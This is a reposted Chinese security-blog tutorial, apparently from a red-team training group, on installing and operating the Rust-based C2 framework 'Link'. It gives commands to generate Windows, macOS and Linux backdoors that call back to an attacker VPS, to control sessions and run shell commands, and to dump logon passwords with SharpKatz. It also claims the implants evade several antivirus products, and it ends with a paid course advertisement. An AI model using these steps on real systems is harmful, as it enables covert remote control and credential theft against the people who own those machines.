⼀款新的C2攻击⼯具-Link
2022-1-5 07:50:0 Author: mp.weixin.qq.com(查看原文) 阅读量:48 收藏

本文作者:清风(Ms08067内网小组核心成员)

学内网 认准Ms08067


⼀、⼯具简介

在翻看公众号的时候发现有⼤佬简单介绍了下这款⼯具,⽹上的教程⼏乎没有,简单研究了下。

Link :rust 语⾔开发的 c2 框架,因为开发语⾔⼩众,所以⽬前国内所有杀软都可过包括WindowsDefender。

功能虽然没有MSF和CobaltStrike成熟,但还是很强⼤的,⾜够实现红队渗透测试⼯作,当CS/MSF特征⽆法绕过的时候,可以尝试使⽤这个⼯具

项⽬地址:

https://github.com/postrequest/link

⼆、安装
不知道是什么原因,国外的vps安装后都⽆法⽣成载荷,暂时未能解决,最后⽤国内vps实验成功的
安装过程较为简单 :

$ git clone https://github.com/postrequest/link$ cd link/$ ./kali-install.sh

执⾏后
会出现这个⻚⾯后,三个选项分别是:
1、继续安装(默认安装)
2、⾃定义安装
3、取消安装


这⾥选择 1 默认安装即可
安装过程较为漫⻓,需要等待下⾯进度条结束:


结束后后直接重启,因为 rust 安装完后需要重启⽣效 :

重启后,再次进⼊到/link⽂件夹下,运⾏启动命令:

./target/release/link //不建议进⼊/target/release/⽬录再执⾏link,那样会让你指定证书位置

启动后,会让你设置⼀个监听端⼝,这个端⼝也是后续shellcode中的端⼝ :


然后进⼊到link的管理模式下,


主要⽤到前三条:
在 Windows, MacOS , Linux 中⽣成载荷:

generate vps-ip:port #⽣成 windows 后⻔generate-osx vps-ip:port #⽣成 苹果 载荷generate-linux vps-ip:port #⽣成 linux 载荷

Windows 上线:
⽣成Windows后⻔(过程相当漫⻓,请耐⼼等待):

generate vps-ip:9080


运⾏link.exe 后上线:
查看当前会话:links ,类似MSF的Sessions


进⼊到当前会话 links -i 会话ID :
进⼊到当前会话中后 可以执⾏命令 whoami


抓取密码:
这个模块需要安装 SharpCollection ⼯具,不然会报错,提示你安装


安装完后再次执⾏:

sharp //可罗列出所有的tools

功能很多,这⾥只介绍SharpKatz模块


SharpKatz 参数介绍:

https://github.com/b4rtik/SharpKatz

sharp svchost SharpKatz --Command logonpasswords //抓取密码

还有很多功能,后续待补充。

Linux上线:
⽣成后⻔:


然后上传到⽬标运⾏ ,成功上线,然后就是Linux上线后的操作:


执⾏命令:

shell linux命令


未完待续。。。

ByPass ⽅⾯:
通过测试发现:Windows Defender、⽕绒、 360 动态、静态都可过

1.7  红队攻防 第5期  最后来袭

课程费用

每期班定价2999第五期班早鸟2499(前40名送499元内网知识星球名额),每个报名学员都可享受一次免费重听后续任意一期班的权益,一次没学懂就再来一遍!

培训采用在线直播+随堂录播+作业+微信群讲师解答的形式,无需等待,报名后立即进入“内网星球”开始预习。毕业推荐HW,推荐就业,有永久录播,报一期班可免费再参加后续任意一期班,内部VIP学习群永久有效。(可开发票,支付信用卡、花呗分期)

报名咨询联系小客服


扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

 

 

目前50000+人已关注加入我们

文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247497409&idx=1&sn=8114a480f823f6eb6625eb6cf7195db4&chksm=fc3c4fc0cb4bc6d6054c832812bc6d45b3729259998d91333fb4c862076ec021a98e82a9b0eb#rd
如有侵权请联系:admin#unsafe.sh